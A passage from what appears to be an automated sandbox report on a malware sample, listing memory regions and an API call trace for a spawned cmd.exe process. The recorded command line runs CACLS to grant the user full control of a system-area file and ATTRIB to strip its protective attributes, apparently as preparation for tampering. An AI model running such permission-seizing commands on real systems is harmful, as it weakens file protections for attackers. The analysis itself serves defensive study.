"private_0x0000000000120000" filename = "" Region: id = 18741 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 18742 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18743 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18744 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18747 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 18750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18751 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18752 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18753 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18754 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 18755 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18756 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 279 os_tid = 0xa4c Process: id = "221" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18757 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18758 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18759 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18760 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 18761 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18762 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18763 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18764 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
Region: id = 18765 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18766 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18767 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18768 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18769 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18770 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 18771 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 18772 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18773 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18774 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18775 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" 
(normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18776 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18777 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18778 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18779 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18780 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18781 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 18782 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18783 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18784 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18785 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000d0000" filename = "" Region: id = 18786 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18787 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18788 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 18789 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 18790 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 18791 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 280 os_tid = 0xb04 [0148.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc84 | out: lpSystemTimeAsFileTime=0x1efc84*(dwLowDateTime=0x9276b9a0, dwHighDateTime=0x1d440a9)) [0148.525] GetCurrentProcessId () returned 0xb3c [0148.525] GetCurrentThreadId () returned 0xb04 [0148.525] GetTickCount () returned 0x2e11a [0148.525] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc7c | out: lpPerformanceCount=0x1efc7c*=20531436486) returned 1 [0148.526] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0148.526] __set_app_type (_Type=0x1) [0148.526] __p__fmode () returned 0x76b331f4 [0148.526] __p__commode () returned 0x76b331fc [0148.526] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0148.526] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c) returned 0 [0148.526] GetCurrentThreadId () returned 0xb04 [0148.526] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x38 [0148.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.527] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0148.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.527] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.527] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc14 | out: phkResult=0x1efc14*=0x0) returned 0x2 [0148.527] VirtualQuery (in: lpAddress=0x1efc4b, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0148.527] GetConsoleOutputCP () returned 0x1b5 [0148.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.528] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.528] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.528] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0148.529] GetEnvironmentStringsW () returned 0x220368* [0148.529] FreeEnvironmentStringsW (penv=0x220368) returned 1 [0148.529] GetEnvironmentStringsW () returned 0x220368* [0148.529] FreeEnvironmentStringsW (penv=0x220368) returned 1 [0148.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb84 | out: phkResult=0x1eeb84*=0x40) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x18, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, 
lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x0, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegCloseKey (hKey=0x40) returned 0x0 [0148.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb84 | out: phkResult=0x1eeb84*=0x40) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, 
lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x0, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegCloseKey (hKey=0x40) returned 0x0 [0148.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0148.530] srand (_Seed=0x5b886377) [0148.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" [0148.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" [0148.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0148.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0148.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0148.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0148.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0148.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0148.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0148.531] GetEnvironmentStringsW () returned 0x2224b8* [0148.532] FreeEnvironmentStringsW (penv=0x2224b8) returned 1 [0148.532] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.532] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.532] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0148.532] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0148.532] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0148.532] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0148.532] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0148.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef950 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef950, lpFilePart=0x1ef94c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef94c*="Desktop") returned 0x18 [0148.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.532] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.533] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.533] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.533] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.533] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.533] GetEnvironmentStringsW () returned 0x220368* [0148.533] FreeEnvironmentStringsW (penv=0x220368) 
returned 1 [0148.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.534] GetConsoleOutputCP () returned 0x1b5 [0148.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.534] GetUserDefaultLCID () returned 0x409 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efa90, cchData=128 | out: lpLCData="0") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efa90, cchData=128 | out: lpLCData="0") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efa90, cchData=128 | out: lpLCData="1") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
